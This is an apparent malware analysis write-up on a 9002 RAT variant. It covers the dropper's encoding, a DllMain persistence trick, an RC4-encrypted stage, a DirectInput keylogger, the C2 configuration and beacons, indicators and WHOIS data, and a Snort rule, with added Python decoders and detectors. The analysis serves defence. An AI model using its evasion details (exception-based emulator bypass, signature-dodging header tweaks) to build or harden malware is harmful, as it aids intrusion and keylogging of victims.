After investigating a newer malicious XLS document, presumably targeted at a Chinese national, I noticed some oddly familiar network traffic produced by the backdoor it dropped. Based on its command-and-control traffic it was very clearly a variant of the 9002 RAT. The 9002 RAT first achieved notoriety back in 2009 in relation to the Operation Aurora attacks, and more recently last year in FireEye’s blog posts about the Sunshop campaign.
However, the RAT itself is relatively uninteresting; beyond basic backdoor capabilities it essentially serves as a platform to download and execute additional DLLs. The part that first struck me this time was the persistence method: it used a standard Run key to call an export from the backdoor via rundll32. This is fairly typical of a DLL backdoor, but the export that was called, when disassembled, appeared to be nothing more than an infinite loop calling the Sleep function. Somehow the malicious routines in the backdoor still started and it began beaconing, so I decided to look a little deeper.
Technical Details
The document itself exploited the oldie but goodie, CVE-2012-0158. The title of the document roughly translates to “Two accounted for in the peace process table”.
Document Details:
MD5: 5E9EBB626F8483ABEB279F3CF90441ED
File Size: 333,824 Bytes
The document contained another encoded document within its body beginning at offset 0xBE00, as well as an encoded executable beginning at offset 0x10C00. Both were encoded using the same scheme: a single-byte XOR against the byte 0x9C and a right rotation (ROR) of each byte by 3 bits. The inner document is what would be shown to the victim upon successful exploitation and was saved as “%temp%\~tmp.xls”. The outer document’s metadata was stripped from the file; however, the inner document retained a last-save date of March 11, 2014 at 1:05 AM PST.
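As an added example (not code from the original post), here is a decoder for the XOR 0x9C / ROR 3 scheme that carves an embedded payload out of a container at a given offset. The post does not say whether the XOR or the rotation was applied first, so the decoder tries both inverses and keeps the one that yields a recognisable OLE2 (legacy .xls) or MZ header; the container it is exercised against is constructed here and is not the malicious document.

```python
"""Carve and decode payloads hidden with a single-byte XOR (0x9C) plus ROR 3."""

XOR_KEY = 0x9C
ROT = 3
# File offsets reported in the post for the decoy XLS and the dropper EXE.
INNER_DOC_OFFSET = 0xBE00
DROPPER_EXE_OFFSET = 0x10C00

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # OLE2 compound file (.xls/.doc)
MZ_MAGIC = b"MZ"                                 # PE executable


def ror8(b: int, n: int) -> int:
    return ((b >> n) | (b << (8 - n))) & 0xFF


def rol8(b: int, n: int) -> int:
    return ((b << n) | (b >> (8 - n))) & 0xFF


def encode(data: bytes, xor_first: bool = True) -> bytes:
    """Apply the scheme as the malware author would. Whether XOR or ROR
    came first is not stated in the post, so both orders are supported."""
    if xor_first:
        return bytes(ror8(b ^ XOR_KEY, ROT) for b in data)
    return bytes(ror8(b, ROT) ^ XOR_KEY for b in data)


def decode(data: bytes, xor_first: bool = True) -> bytes:
    """Invert encode(): undo the last operation first."""
    if xor_first:   # encoder did XOR then ROR -> ROL then XOR
        return bytes(rol8(b, ROT) ^ XOR_KEY for b in data)
    return bytes(rol8(b ^ XOR_KEY, ROT) for b in data)   # encoder did ROR then XOR


def identify(data: bytes) -> str:
    """Cheap header check used to decide which decode order was right."""
    if data.startswith(OLE_MAGIC):
        return "ole2"
    if data.startswith(MZ_MAGIC):
        return "pe"
    return "unknown"


def carve(container: bytes, offset: int, length=None) -> bytes:
    """Decode the blob at `offset` (to end of file if `length` is None),
    trying both operation orders and returning the first that looks like
    a real file. Raises if neither order produces a known header."""
    blob = container[offset:] if length is None else container[offset:offset + length]
    for xor_first in (True, False):
        plain = decode(blob, xor_first)
        if identify(plain) != "unknown":
            return plain
    raise ValueError("no known header after decoding; key or operation order differs")


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read()
    for name, off in (("inner_doc", INNER_DOC_OFFSET), ("dropper", DROPPER_EXE_OFFSET)):
        out = carve(data, off)
        print(name, identify(out), len(out))
        open(f"{name}.bin", "wb").write(out)
```

When run against a real container the second payload runs to end of file, so the carved decoy document will include the trailing executable unless you pass an explicit length; checking the decoded header is what tells you the key and order are right before you spend time on the rest.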
The dropper was signed with a valid certificate belonging to “A’digm Inc.” and was written to “C:\RECYCLER\bmp{hex digit}.tmp”, where “hex digit” is a randomly generated hexadecimal digit.
Dropper Details:
MD5: 33FC96A418AB7698DDBA97F240408B3B
File Size: 265,200 Bytes
Compile Time: 12/16/2013 03:08:29 UTC
Dropper Certificate Details:
Serial Number: 45 6E 96 7A 81 5A A5 CB B9 9F B8 6A CA 8F 7F 69
Thumbprint: 91 24 87 EC CF 3E 76 82 06 9E E4 F2 B8 2F 25 21 B0 BD 3B 1C
Validity: December 30, 2012 5:00 PM – January 30, 2015 4:59:59 PM
Subject: CN: A’digm, Inc. O: A’digm, Inc. L: Gangnam-gu S: Seoul C: KR
Backdoor Details:
MD5: 863A5521633B735185850222363CF853
File Size: 144,968 Bytes
Compile Time: 12/09/2013 05:48:37 UTC
When executed, the dropper decodes the backdoor from a resource named “RES” within its body and writes it to “%CommonProgramFiles%\ODBC\Mshype.dll”. The backdoor was also signed with the same “A’digm Inc.” certificate, on December 9, 2013 at 05:49:18 UTC. The dropper creates several registry keys, including a Run key to establish persistence on the victim machine.
Registry Changes:
• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First
• HKCU\Software\Transpan\RunPath -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First
• HKCU\Software\TransPan\mshtm -> plain-text configuration data (0x1F8 bytes)
Persistence Mechanism:
• Run key in the victim user’s registry hive: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561, which calls an export from the backdoor “Mshype.dll” via rundll32.exe
File System Changes:
• %temp%\~tmp.xls
• C:\RECYCLER\bmp{Hex Character(s)}.tmp
• %CommonProgramFiles%\ODBC\Mshype.dll
• %CommonProgramFiles%\ODBC\temp_k.ax (stored keystrokes)
• May create %temp%\{hostname}_p.ax
• May create %temp%\uid.ax
• May create %CommonProgramFiles%\ODBC\temp_plugin.ax
• May create %UserProfile%\AppData\Roaming\Microsoft\mscmos.ini (Vista+)
• May create %UserProfile%\AppData\Roaming\Microsoft\temp_plugin.ax (Vista+)
• May create %UserProfile%\AppData\Roaming\temp_k.ax (Vista+)
Volatile Evidence:
• Creates the mutex “QPONMLKJIH”
• Creates the mutex DirectInput.{89521361-AA8A-11CF-BFC7-444553540000}
• Creates the mutex DirectInput.{5944E682-C92E-11CF-BFC7-444553540000}
What immediately struck me as odd about the backdoor was that the persistence mechanism called the exported function “Process32First”, which when disassembled does nothing more than sleep for five seconds in an infinite loop. Somehow the sample would still begin to beacon out. I spent a few hours puzzling over this one before realizing that when rundll32.exe uses LoadLibraryW to load “Mshype.dll” into its address space, the DLL’s DllMain function is called (with DLL_PROCESS_ATTACH) before the named export is ever invoked.
The DllMain function in turn contains a subroutine that calls CreateThread with a start address of 0x10001022. This thread intentionally raises a non-continuable exception with a standard RaiseException call; the exception handler then starts a new thread at 0x1000105B, which contains the beginning of the decryption routines for the actual backdoor. My current guess is that the structured exception handling is there to bypass some of the common emulation engines used in malware analysis; unsurprisingly, this sample currently has a detection rate of two.
The 9002 variant still uses an intermediate stage of self-modifying shellcode before reaching the actual unencrypted code, although the standard encryption mechanism has been significantly altered to use RC4 with the key “0123456789” instead of a single-byte XOR. The first stage is stored at file offset 0xF040 and, once carved out of the DLL, can be decoded using the Python script below.
from Crypto.Cipher import ARC4   # pip install pycryptodome
import sys

# Decrypt the RC4-encrypted first-stage shellcode with the hard-coded key
# "0123456789". The input is the stage carved out of the DLL at file offset
# 0xF040; the output is written next to it with a ".dec" suffix.
with open(sys.argv[1], 'rb') as f:
    binary = f.read()

key = b'0123456789'
rc4 = ARC4.new(key)
decrypted = rc4.decrypt(binary)

with open(sys.argv[1] + '.dec', 'wb') as out:
    out.write(decrypted)

Figure 1: Python Script to Decrypt 1st Stage Shellcode
The backdoor also included a DLL module inside its body that is loaded and run once decrypted. This DLL was designed to log keystrokes and other activity to the file “%CommonProgramFiles%\ODBC\temp_k.ax” or “%UserProfile%\AppData\Roaming\temp_k.ax”, depending on the operating system. The keylogger itself was relatively uninteresting except for its use of DINPUT8.dll, the DirectX module more commonly responsible for providing joystick, mouse, keyboard, and other controller interfaces. The DirectInput 8 interface gives the keylogger more granularity in determining exactly what activity occurred on the system. Keystrokes are stored as Unicode (UTF-16LE) with a simple one-byte XOR against the byte 0x56 applied to every byte, which is why every other byte of the encoded file is 0x56.
00000000 0D 56 01 56 1F 56 18 56 0B 56 5B 56 5C 56 2A 56 .V.V.V.V.V[V\V*V
00000010 2A 56 01 56 3F 56 38 56 32 56 39 56 21 56 25 56 *V.V?V8V2V9V!V%V
00000020 76 56 02 56 3F 56 22 56 3A 56 33 56 6C 56 76 56 vV.V?V"V:V3VlVvV
00000030 19 56 26 56 33 56 38 56 76 56 10 56 3F 56 3A 56 .V&V3V8VvV.V?V:V
00000040 33 56 25 56 76 56 2A 56 2A 56 64 56 66 56 67 56 3V%VvV*V*VdVfVgV
00000050 62 56 79 56 66 56 62 56 79 56 67 56 61 56 76 56 bVyVfVbVyVgVaVvV
00000060 67 56 62 56 6C 56 67 56 60 56 6C 56 65 56 63 56 gVbVlVgV`VlVeVcV
00000070 5B 56 5C 56 2A 56 2A 56 32 56 23 56 3B 56 26 56 [V\V*V*V2V#V;V&V
00000080 5B 56 5C 56 2A 56 2A 56 01 56 3F 56 38 56 32 56 [V\V*V*V.V?V8V2V
00000090 39 56 21 56 25 56 76 56 02 56 3F 56 22 56 3A 56 9V!V%VvV.V?V"V:V
000000A0 33 56 6C 56 76 56 01 56 3F 56 38 56 1E 56 33 56 3VlVvV.V?V8V.V3V
000000B0 2E 56 76 56 7B 56 76 56 0D 56 32 56 23 56 3B 56 .VvV{VvV.V2V#V;V
000000C0 26 56 33 56 32 56 78 56 32 56 3A 56 3A 56 0B 56 &V3V2VxV2V:V:V.V
000000D0 76 56 2A 56 2A 56 64 56 66 56 67 56 62 56 79 56 vV*V*VdVfVgVbVyV
000000E0 66 56 62 56 79 56 67 56 61 56 76 56 67 56 62 56 fVbVyVgVaVvVgVbV
000000F0 6C 56 67 56 60 56 6C 56 65 56 63 56 5B 56 5C 56 lVgV`VlVeVcV[V\V
00000100 2A 56 2A 56 6A 56 13 56 18 56 02 56 13 56 04 56 *V*VjV.V.V.V.V.V
00000110 68 56 5B 56 5C 56 hV[V\V
Figure 2: Example Encoded Activity from “temp_k.ax”
00000000 5B 00 57 00 49 00 4E 00 5D 00 0D 00 0A 00 7C 00 [.W.I.N.].....|.
00000010 7C 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 |.W.i.n.d.o.w.s.
00000020 20 00 54 00 69 00 74 00 6C 00 65 00 3A 00 20 00 .T.i.t.l.e.:. .
00000030 4F 00 70 00 65 00 6E 00 20 00 46 00 69 00 6C 00 O.p.e.n. .F.i.l.
00000040 65 00 73 00 20 00 7C 00 7C 00 32 00 30 00 31 00 e.s. .|.|.2.0.1.
00000050 34 00 2F 00 30 00 34 00 2F 00 31 00 37 00 20 00 4./.0.4./.1.7. .
00000060 31 00 34 00 3A 00 31 00 36 00 3A 00 33 00 35 00 1.4.:.1.6.:.3.5.
00000070 0D 00 0A 00 7C 00 7C 00 64 00 75 00 6D 00 70 00 ....|.|.d.u.m.p.
00000080 0D 00 0A 00 7C 00 7C 00 57 00 69 00 6E 00 64 00 ....|.|.W.i.n.d.
00000090 6F 00 77 00 73 00 20 00 54 00 69 00 74 00 6C 00 o.w.s. .T.i.t.l.
000000A0 65 00 3A 00 20 00 57 00 69 00 6E 00 48 00 65 00 e.:. .W.i.n.H.e.
000000B0 78 00 20 00 2D 00 20 00 5B 00 64 00 75 00 6D 00 x. .-. .[.d.u.m.
000000C0 70 00 65 00 64 00 2E 00 64 00 6C 00 6C 00 5D 00 p.e.d...d.l.l.].
000000D0 20 00 7C 00 7C 00 32 00 30 00 31 00 34 00 2F 00 .|.|.2.0.1.4./.
000000E0 30 00 34 00 2F 00 31 00 37 00 20 00 31 00 34 00 0.4./.1.7. .1.4.
000000F0 3A 00 31 00 36 00 3A 00 31 00 36 00 3A 00 33 00 35 00 0D 00 0A 00 :.1.6.:.3.5.....
00000100 7C 00 7C 00 3C 00 45 00 4E 00 54 00 45 00 52 00 |.|.<.E.N.T.E.R.
00000110 3E 00 0D 00 0A 00 >.....
Figure 3: Decoded Activity from “temp_k.ax”
Keylogger Details (In Memory Only):
MD5: 901C45A594B9FC9CB27723B7CE430235
File Size: 69,120 Bytes
Compile Time: 12/09/2013 05:41:33 UTC
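The following is an added example, not code from the original post: it decodes a temp_k.ax log (XOR 0x56 over UTF-16LE, as described above) and splits the result into window-title and keystroke records. The encoded bytes embedded below are the Figure 2 dump; the record layout the parser assumes (a “[WIN]” marker line, “||Windows Title: <title> ||<timestamp>” lines and “||<keys>” lines) is inferred from Figure 3 and is an assumption, not documented behaviour of the keylogger.

```python
"""Decode and parse a 9002 keylogger file (temp_k.ax): UTF-16LE XOR 0x56."""

KEYLOG_XOR = 0x56

# Encoded bytes exactly as printed in Figure 2 (278 bytes).
SAMPLE_TEMP_K = bytes.fromhex("""
0D 56 01 56 1F 56 18 56 0B 56 5B 56 5C 56 2A 56
2A 56 01 56 3F 56 38 56 32 56 39 56 21 56 25 56
76 56 02 56 3F 56 22 56 3A 56 33 56 6C 56 76 56
19 56 26 56 33 56 38 56 76 56 10 56 3F 56 3A 56
33 56 25 56 76 56 2A 56 2A 56 64 56 66 56 67 56
62 56 79 56 66 56 62 56 79 56 67 56 61 56 76 56
67 56 62 56 6C 56 67 56 60 56 6C 56 65 56 63 56
5B 56 5C 56 2A 56 2A 56 32 56 23 56 3B 56 26 56
5B 56 5C 56 2A 56 2A 56 01 56 3F 56 38 56 32 56
39 56 21 56 25 56 76 56 02 56 3F 56 22 56 3A 56
33 56 6C 56 76 56 01 56 3F 56 38 56 1E 56 33 56
2E 56 76 56 7B 56 76 56 0D 56 32 56 23 56 3B 56
26 56 33 56 32 56 78 56 32 56 3A 56 3A 56 0B 56
76 56 2A 56 2A 56 64 56 66 56 67 56 62 56 79 56
66 56 62 56 79 56 67 56 61 56 76 56 67 56 62 56
6C 56 67 56 60 56 6C 56 65 56 63 56 5B 56 5C 56
2A 56 2A 56 6A 56 13 56 18 56 02 56 13 56 04 56
68 56 5B 56 5C 56
""")


def decode_keylog(raw: bytes) -> str:
    """XOR every byte with 0x56 and decode the result as UTF-16LE.
    The high byte of each ASCII code unit is 0x00, hence the 0x56 stripes."""
    if len(raw) % 2:
        raise ValueError("UTF-16LE data must have an even length")
    return bytes(b ^ KEYLOG_XOR for b in raw).decode("utf-16-le")


def parse_records(text: str) -> list:
    """Split decoded log text into records (layout inferred from Figure 3)."""
    records = []
    for line in text.split("\r\n"):
        if not line:
            continue
        if line.startswith("||"):
            body = line[2:]
            prefix = "Windows Title: "
            if body.startswith(prefix):
                title, _, when = body[len(prefix):].partition("||")
                records.append({"type": "window", "title": title.strip(), "time": when.strip()})
            else:
                records.append({"type": "keys", "value": body})
        else:
            records.append({"type": "marker", "value": line})
    return records


if __name__ == "__main__":
    import sys
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_TEMP_K
    for rec in parse_records(decode_keylog(raw)):
        print(rec)
```

Because the transform is a plain XOR, the same function re-encodes a cleaned-up log, which is handy when building a test fixture for a detection or forensic tool.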
This is probably the first of a number of variants to come. A copious number of debug statements were left in the code and can be viewed with something like Sysinternals’ DebugView.
Network Traffic Details and Detection
After the second stage is decrypted in memory, the backdoor uses the configuration data stored in plain text in “HKCU\Software\TransPan\mshtm” and beacons to “180.169.28.58” on port 1080.
00000000 30 30 30 30 30 30 30 30 00 00 00 00 00 00 00 00 00000000........
00000010 44 65 66 61 75 6C 74 00 00 00 00 00 00 00 00 00 Default.........
00000020 31 38 30 2E 31 36 39 2E 32 38 2E 35 38 00 00 00 180.169.28.58...
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050 00 00 00 00 38 04 00 00 67 00 6F 00 6F 00 64 00 ....8...g.o.o.d.
00000060 6E 00 65 00 77 00 73 00 70 00 61 00 70 00 65 00 n.e.w.s.p.a.p.e.
00000070 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 r...............
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 38 04 00 00 ............8...
000000C0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000120 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ................
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000160 00 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 ....8...........
00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000001D0 00 00 00 00 00 00 00 00 76 32 2E 38 00 00 00 00 ........v2.8....
000001E0 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................
000001F0 FF FF FF FF FF FF FF FF ÿÿÿÿÿÿÿÿ
Figure 4: Configuration Data Stored in "mshtm" Registry Key
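An added example (not from the original post) that reads the 0x1F8-byte “mshtm” value and pulls out the fields visible in Figure 4. The offsets are taken straight off the dump; only the C2 host, port and version string are confirmed by the analysis above, so the names given to the other fields (“tag”, “label”, “wide_string”, the repeated port copies and the unnamed DWORDs) are assumptions. The sample blob is constructed here to reproduce the Figure 4 layout byte for byte.

```python
"""Parse the plain-text 9002 configuration stored under HKCU\\Software\\TransPan\\mshtm."""
import struct

CONFIG_SIZE = 0x1F8   # size of the registry value reported in the post

# Offsets read from the Figure 4 dump. Field names other than c2 host/port/version are guesses.
OFF_TAG       = 0x00   # "00000000", 8 ASCII bytes, meaning unknown
OFF_LABEL     = 0x10   # "Default", NUL-terminated ASCII, meaning unknown
OFF_C2_HOST   = 0x20   # "180.169.28.58", NUL-terminated ASCII
OFF_C2_PORT   = 0x54   # 0x00000438 = 1080, little-endian DWORD
OFF_WSTR      = 0x58   # "goodnewspaper", NUL-terminated UTF-16LE, meaning unknown
OFF_PORT2     = 0xBC   # 1080 again
OFF_DWORD_C0  = 0xC0   # 0x14
OFF_DWORD_12C = 0x12C  # 0x02
OFF_PORT3     = 0x164  # 1080 again
OFF_VERSION   = 0x1D8  # "v2.8"
OFF_DWORD_1E8 = 0x1E8  # 0x01
OFF_TRAILER   = 0x1F0  # 8 x 0xFF


def _cstr(buf: bytes, off: int, maxlen: int) -> str:
    return buf[off:off + maxlen].split(b"\x00", 1)[0].decode("ascii", "replace")


def _wstr(buf: bytes, off: int, maxlen: int) -> str:
    return buf[off:off + maxlen].decode("utf-16-le", "replace").split("\x00", 1)[0]


def _u32(buf: bytes, off: int) -> int:
    return struct.unpack_from("<I", buf, off)[0]


def parse_config(blob: bytes) -> dict:
    if len(blob) != CONFIG_SIZE:
        raise ValueError(f"expected {CONFIG_SIZE:#x} bytes, got {len(blob):#x}")
    return {
        "tag":         _cstr(blob, OFF_TAG, 8),
        "label":       _cstr(blob, OFF_LABEL, OFF_C2_HOST - OFF_LABEL),
        "c2_host":     _cstr(blob, OFF_C2_HOST, OFF_C2_PORT - OFF_C2_HOST),
        "c2_port":     _u32(blob, OFF_C2_PORT),
        "wide_string": _wstr(blob, OFF_WSTR, OFF_PORT2 - OFF_WSTR),
        "port_copy2":  _u32(blob, OFF_PORT2),
        "dword_c0":    _u32(blob, OFF_DWORD_C0),
        "dword_12c":   _u32(blob, OFF_DWORD_12C),
        "port_copy3":  _u32(blob, OFF_PORT3),
        "version":     _cstr(blob, OFF_VERSION, 16),
        "dword_1e8":   _u32(blob, OFF_DWORD_1E8),
        "trailer":     blob[OFF_TRAILER:OFF_TRAILER + 8],
    }


def build_sample_config() -> bytes:
    """Constructed blob reproducing the Figure 4 layout (for offline testing)."""
    buf = bytearray(CONFIG_SIZE)

    def put(off, data):
        buf[off:off + len(data)] = data

    put(OFF_TAG, b"00000000")
    put(OFF_LABEL, b"Default")
    put(OFF_C2_HOST, b"180.169.28.58")
    put(OFF_C2_PORT, struct.pack("<I", 1080))
    put(OFF_WSTR, "goodnewspaper".encode("utf-16-le"))
    put(OFF_PORT2, struct.pack("<I", 1080))
    put(OFF_DWORD_C0, struct.pack("<I", 0x14))
    put(OFF_DWORD_12C, struct.pack("<I", 2))
    put(OFF_PORT3, struct.pack("<I", 1080))
    put(OFF_VERSION, b"v2.8")
    put(OFF_DWORD_1E8, struct.pack("<I", 1))
    put(OFF_TRAILER, b"\xff" * 8)
    return bytes(buf)


def read_live_config() -> bytes:
    """On an infected Windows host, fetch the value directly (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\TransPan") as key:
        value, _ = winreg.QueryValueEx(key, "mshtm")
    return value


if __name__ == "__main__":
    for k, v in parse_config(build_sample_config()).items():
        print(f"{k:12s} {v!r}")
```

The three identical port values and the size check make a cheap sanity test when triaging a host: if the value is the wrong length or the port copies disagree, you are probably looking at a different build and should not trust the offsets above.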
Two sample beacon packets are shown in the figures below:
00000000 33 31 30 32 0C 00 00 00 08 00 00 00 19 FF FF FF 3102.........ÿÿÿ
00000010 FF 00 00 00 00 11 00 00 ÿ.......
Figure 5: Sample Beacon Packet
The first beacon always begins with the string “3102”. The next four bytes are the encoded payload size and the following four bytes are the decoded payload size, both little-endian DWORDs (0x0C and 0x08 in Figure 5, and the 12 bytes that follow the 12-byte header are indeed the payload). The payload data is still compressed with the LZO compression library. The second beacon type uses a similar protocol wrapped in base64 and sent within HTTP POST requests.
POST /{Hex Number} HTTP/1.1
User-Agent: lynx
Host: 180.169.28.58:1080
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache

AA
It may also beacon using an HTTP CONNECT request; however, this behavior was not observed in testing. The User-Agent makes these requests incredibly distinct and easy to detect, as not many people, even neckbeards, use the command-line browser lynx. Once decrypted in memory, the backdoor also appears to contain an old (or perhaps backup) configuration block with a version number of 1.0; however, no activity was observed going to the address in it. The old configuration block pointed to “www.aestheticismwoods.com:443”; “www.aestheticismwoods.com” currently resolves to “202.55.5.177” and was first registered in May 2010 using the email address “xutongshen_fj@hotmail.com”.
WHOIS Information for aestheticismwoods.com
Registrant Name: huangmeng
Registrant Organization: huang meng
Registrant Street: shanghai zhangheng
Registrant City: shanghai
Registrant State/Province: SH
Registrant Postal Code: 201204
Registrant Country: CN
Registrant Phone: +86.2161016550
Registrant Phone Ext: 0
Registrant Fax: +86.2161016551
Registrant Email: xutongshen_fj@hotmail.com
It’s clear that simple changes to protocol headers are much easier to make than rewriting the network protocol itself. Despite FireEye’s suggestion of using the trailing 20 bytes to build a network signature for the initial beacon, the rules proposed in Emerging Threats still match on the full 24 bytes. Similarly, for the second type of HTTP traffic the signature below exists:
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Possible Trojan.APT.9002 POST"; flow:established,to_server; content:"POST "; depth:5; pcre:"/^POST\s+\/[a-f0-9]+\s/U"; content:!"|0d 0a|Referer|3a|"; distance:0; content:"User-Agent|3a 20|lynx|0d 0a|"; distance:0; reference:url,www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html; classtype:trojan-activity; sid:2017702; rev:2;)
It looks for an unnecessary number of additional headers and would not fire on this particular variant. I’d recommend just looking for POST requests with a User-Agent of “lynx”; if people are posting content to the Internet with lynx you probably want to look at it anyway (make sure to use the “tag” feature so the packets that follow the alert are logged too). I’m sure more simple header changes are coming, since that seems to be all it takes to bypass current network-monitoring devices and the present state of the security mindset. In the same vein, attackers are continuing to move back towards more traditional and other custom small encryption algorithms as the industry slowly begins to detect more XOR’d content. Attackers wouldn’t use these kinds of simple tweaks if they didn’t continue to work so effectively.
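The following is an added example, not code from the original post or from Emerging Threats, covering both the raw beacon format (Figure 5) and the HTTP signature discussion above. It parses the “3102” beacon header, checks that the encoded length actually matches the bytes on the wire, and then runs two predicates over sample requests: an approximation of the ET rule (POST, lowercase-hex path, no Referer header, User-Agent exactly “lynx”) beside the looser “any POST from lynx” check recommended here. The Figure 5 bytes are the post’s; the HTTP requests are constructed, with a made-up hex path standing in for the “{Hex Number}” placeholder, and the second one adds a Referer header purely to show how extra conditions cost a signature a hit.

```python
"""Detect 9002 beacons: raw TCP framing and lynx HTTP POSTs."""
import re
import struct

BEACON_MAGIC = b"3102"
HEADER_LEN = 12   # magic(4) + encoded length(4) + decoded length(4), lengths little-endian

# Figure 5 beacon, 24 bytes, exactly as printed in the post.
SAMPLE_BEACON = bytes.fromhex("33313032 0C000000 08000000 19FFFFFFFF00000000110000")

# Constructed requests (the real path is "/{Hex Number}"; "1a2b3c" is made up).
LYNX_POST = ("POST /1a2b3c HTTP/1.1\r\nUser-Agent: lynx\r\nHost: 180.169.28.58:1080\r\n"
             "Content-Length: 2\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nAA")
LYNX_POST_WITH_REFERER = LYNX_POST.replace("Host:", "Referer: http://example.invalid/\r\nHost:")
LYNX_GET = "GET / HTTP/1.1\r\nUser-Agent: lynx\r\nHost: example.invalid\r\n\r\n"


def parse_beacon(pkt: bytes):
    """Return (encoded_len, decoded_len, payload) or None if pkt is not a complete beacon."""
    if len(pkt) < HEADER_LEN or pkt[:4] != BEACON_MAGIC:
        return None
    enc_len, dec_len = struct.unpack_from("<II", pkt, 4)
    payload = pkt[HEADER_LEN:HEADER_LEN + enc_len]
    if len(payload) != enc_len:       # truncated or lying header: not worth alerting on
        return None
    return enc_len, dec_len, payload


def parse_http_request(raw: str):
    """Minimal request parser: (method, path, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def matches_et_rule(raw: str) -> bool:
    """Approximation of ET sid 2017702: POST, /[a-f0-9]+ path, no Referer, UA 'lynx'."""
    method, path, headers, _ = parse_http_request(raw)
    return (method == "POST"
            and re.fullmatch(r"/[a-f0-9]+", path) is not None
            and "referer" not in headers
            and headers.get("user-agent") == "lynx")


def matches_lynx_post(raw: str) -> bool:
    """The recommendation above: any POST whose User-Agent is lynx."""
    method, _, headers, _ = parse_http_request(raw)
    return method == "POST" and headers.get("user-agent", "").lower() == "lynx"


def scan(requests) -> list:
    """Run both predicates over a batch of requests; returns one (et, lynx) pair each."""
    return [(matches_et_rule(r), matches_lynx_post(r)) for r in requests]


if __name__ == "__main__":
    print(parse_beacon(SAMPLE_BEACON))
    print(scan([LYNX_POST, LYNX_POST_WITH_REFERER, LYNX_GET]))
```

The GET sample shows why the loose rule is still not a blanket “lynx” match: ordinary lynx browsing is GETs, and it is the POST that is unusual enough to be worth a look.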